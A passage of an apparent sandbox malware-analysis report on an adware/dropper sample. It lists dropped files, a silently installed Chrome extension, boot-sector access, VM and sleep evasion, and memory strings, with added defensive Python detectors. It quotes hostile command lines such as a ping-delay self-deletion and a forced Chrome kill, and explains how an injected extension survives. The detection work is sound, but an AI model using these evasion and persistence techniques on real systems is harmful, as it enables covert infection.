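    "DEADBEEF" * 5: build_cert_blob(ROGUE_DER),   # subkey name that does not match its blob
}

if __name__ == "__main__":
    for thumb, verdict in audit_root_store(SAMPLE_ENTRIES, {GOOD_SHA1}).items():
        print(verdict, thumb)
```

Run against a real host, the subkey 6C0CE2DD0584C47CAC18839F14055F19FA270CDD from this report would come back as "unexpected" unless the baseline was taken after the infection; the SHA-256 returned by `inspect_entry` is what to use when comparing with sources that do not list SHA-1.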
Drops PE files
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe File created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Jump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\SibClr.dll Jump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File created: C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dll Jump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File created: C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll Jump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe File created: C:\Program Files (x86)\71eza90awf48\aliens.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File created: C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll Jump to dropped file
Installs a Chrome extension
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\icon.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\icon48.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\popup.html Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\background.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\book.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\jquery-1.8.3.min.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\popup.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\manifest.json Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04FABE50 _memset,SHGetSpecialFolderPathA,_strcat_s,PathFileExistsA,_memset,GetPrivateProfileStringA,_strlen,_strlen,PathRemoveFileSpecA,_strcat_s,_strcat_s,PathFileExistsA,PathFindFileNameA, 21_2_04FABE50
Note: files dropped into the profile's Extensions directory do not by themselves register an extension; Chrome loads the extensions recorded in the profile's Preferences / Secure Preferences files, which this report does not show being modified. The earlier "taskkill /f /im chrome.exe" launched by the same process is part of this step: Chrome rewrites its preference files while running, so the profile has to be closed for an injected entry to survive.

Boot Survival:

barindex
Contains functionality to infect the boot sector
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d 4_2_1001DA70
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 4_2_1001D7E0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 4_2_1001D370

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\msiexec.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\1607186572092.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1607186588295.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100202D0 4_2_100202D0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04F05AA0 21_2_04F05AA0
Uses ping.exe to sleep
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
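The cmd.exe lines in the process tree above show two patterns worth detecting generically rather than by hash: "ping 127.0.0.1 -n 3 & del <own image>" (ping to loopback as a sleep, then deletion of the parent process's own executable once it has exited) and "taskkill /f /im chrome.exe" ahead of the browser-profile modifications. The following is an added example, not code from the report or from any vendor's ruleset: it tokenises each logged command line into cmd.exe segments, parses ping's -n count and target, and ties a del target back to the image of the process that spawned cmd.exe. The event records are constructed from the command lines listed in this report, plus one constructed benign ping as a control.

```python
"""Flag ping-as-sleep, self-deletion and browser termination in process-creation events.
Added example; the sample events are constructed from this report's command lines."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # image of the creating process ("unknown" if the sandbox could not resolve it)
    image: str          # image of the created process
    cmdline: str        # command line as logged


LOOPBACK = {"127.0.0.1", "localhost", "::1"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "opera.exe", "brave.exe"}
VALUE_SWITCHES = {"-w", "-l", "-i", "-v", "-s", "-j", "-k", "-r"}   # ping switches that take a value

CMD_PREFIX = re.compile(r'^\s*"?(?:[^"\s]*\\)?cmd(?:\.exe)?"?\s+/[ck]\s+', re.I)
PING_RE = re.compile(r"^\s*(?:\S*\\)?ping(?:\.exe)?\s+(?P<args>.*)$", re.I)
DEL_RE = re.compile(r"^\s*(?:del|erase)\s+(?P<args>.*)$", re.I)
TASKKILL_RE = re.compile(r"^\s*(?:\S*\\)?taskkill(?:\.exe)?\s+(?P<args>.*)$", re.I)


def split_segments(cmdline):
    """Drop a leading 'cmd /c' and split on &, &&, |, || (the quoted paths here contain none)."""
    body = CMD_PREFIX.sub("", cmdline)
    return [s.strip() for s in re.split(r"\s*(?:&&|\|\||&|\|)\s*", body) if s.strip()]


def parse_ping(args):
    """Return (target, count) for a ping argument string, or None when -n <count> is absent."""
    tokens, target, count, i = args.split(), None, None, 0
    while i < len(tokens):
        low = tokens[i].lower()
        if low == "-n" and i + 1 < len(tokens) and tokens[i + 1].isdigit():
            count, i = int(tokens[i + 1]), i + 2
        elif low in VALUE_SWITCHES:
            i += 2
        else:
            if not low.startswith(("-", "/")):
                target = tokens[i].strip("'\"")
            i += 1
    return (target, count) if count is not None else None


def _norm_path(text):
    """Strip the single or double quotes the shell/sandbox put around a path; compare case-insensitively."""
    return text.strip().strip("'\"").lower()


def analyze(events):
    """Return [(finding, created image, detail)] over a list of ProcEvent."""
    findings = []
    for ev in events:
        for seg in split_segments(ev.cmdline):
            if m := PING_RE.match(seg):
                parsed = parse_ping(m.group("args"))
                if parsed and parsed[0] and parsed[0].lower() in LOOPBACK and parsed[1] >= 2:
                    # ping waits about one second between echo requests: N requests ~ N-1 s of delay
                    findings.append(("ping_sleep", ev.image, f"~{parsed[1] - 1}s: {seg}"))
            elif m := DEL_RE.match(seg):
                path = _norm_path(re.sub(r"^(?:/[a-z]\s+)*", "", m.group("args"), flags=re.I))
                kind = "self_delete" if path == _norm_path(ev.parent_image) else "delete"
                findings.append((kind, ev.image, path))
            elif m := TASKKILL_RE.match(seg):
                im = re.search(r"/im\s+(\S+)", m.group("args"), re.I)
                if im and im.group(1).strip("'\"").lower() in BROWSERS:
                    findings.append(("browser_kill", ev.image, im.group(1)))
    return findings


SAMPLE_EVENTS = [   # constructed from the 'Process created' lines of this report
    ProcEvent(r"C:\Program Files (x86)\71eza90awf48\aliens.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r"cmd /c ping 127.0.0.1 -n 3 & del 'C:\Program Files (x86)\71eza90awf48\aliens.exe'"),
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r"cmd.exe /c taskkill /f /im chrome.exe"),
    ProcEvent("unknown", r"C:\Windows\SysWOW64\cmd.exe",
              r"cmd /c ping 8.8.8.8 -n 3"),   # constructed control: a reachability check, not a sleep
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(*finding, sep="\t")
```

The self-delete check needs the parent image, which is exactly what the unresolved "Process created: unknown unknown" entries in this report lack; feed it Sysmon event 1 or EDR telemetry that records ParentImage and the match is exact. Pinging 127.0.0.1 with -n is flagged only when the target is loopback, so ordinary reachability checks (the "Uses ping.exe to check the status of other devices" signature) are not swept up.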
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality to read device registry values (via SetupAPI)
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA, 4_2_10019780
Found dropped PE file which has not been started or loaded
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Jump to dropped file
Note: this contradicts the process tree above, where aliens.exe starts 1E1C360C582DF797.exe twice (arguments "0011 installp3" and "200 installp3") and that process goes on to spawn the NirSoft tools, ThunderFW.exe and the taskkill command. Treat the process-creation entries as authoritative; the signature here is a reporting artefact, not evidence that the dropper failed to run.
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04F05AA0 21_2_04F05AA0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100202D0 4_2_100202D0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe TID: 5536 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe TID: 5604 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 4744 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 3748 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 3748 Thread sleep time: -62000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 5688 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100223C0 GetLocalTime followed by cmp: cmp ecx, 01h and CTI: jl 10022474h 4_2_100223C0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100223C0 GetLocalTime followed by cmp: cmp edx, 08h and CTI: jnle 10022474h 4_2_100223C0
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406CC7
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_00406301 FindFirstFileW,FindClose, 0_2_00406301
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E660F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose, 0_2_6E660F62
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E651C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose, 0_2_6E651C23
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121A534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 1_2_0121A534
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0123A928 FindFirstFileExA, 1_2_0123A928
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122B820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 1_2_0122B820
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_00402D09 FindFirstFileA, 4_2_00402D09
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_0040693B DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 4_2_0040693B
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_004066CC FindFirstFileA,FindClose, 4_2_004066CC
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1001A170 FindFirstFileA,FindClose, 4_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026DC704 PathFileExistsW,FindFirstFileW,FindClose, 21_2_026DC704
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026E1F70 FindFirstFileW,FindClose,@_RTC_CheckStackVars@8, 21_2_026E1F70
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04FA7950 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose, 21_2_04FA7950
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04FA5A90 FindFirstFileA,FindClose, 21_2_04FA5A90
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122DBC8 VirtualQuery,GetSystemInfo, 1_2_0122DBC8
Source: 1E1C360C582DF797.exe, 00000015.00000003.563174149.0000000005D84000.00000004.00000001.sdmp Binary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI
Source: 1E1C360C582DF797.exe, 00000015.00000003.552028868.0000000005D11000.00000004.00000001.sdmp Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug 
Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 1E1C360C582DF797.exe, 00000015.00000003.551853011.0000000005D84000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: 1E1C360C582DF797.exe, 00000015.00000003.549908726.0000000005D11000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 1E1C360C582DF797.exe, 00000015.00000003.551758159.0000000005D57000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.652027273.00000000041F0000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 1E1C360C582DF797.exe, 00000015.00000003.551758159.0000000005D57000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.652027273.00000000041F0000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 1E1C360C582DF797.exe, 00000019.00000002.650414355.000000000019B000.00000004.00000010.sdmp Binary or memory string: VMware Virtual disk 2.0
Source: 1E1C360C582DF797.exe, 00000019.00000002.650414355.000000000019B000.00000004.00000010.sdmp Binary or memory string: VMware
Source: 1E1C360C582DF797.exe, 00000015.00000003.549962480.000000000415C000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation Counter ID
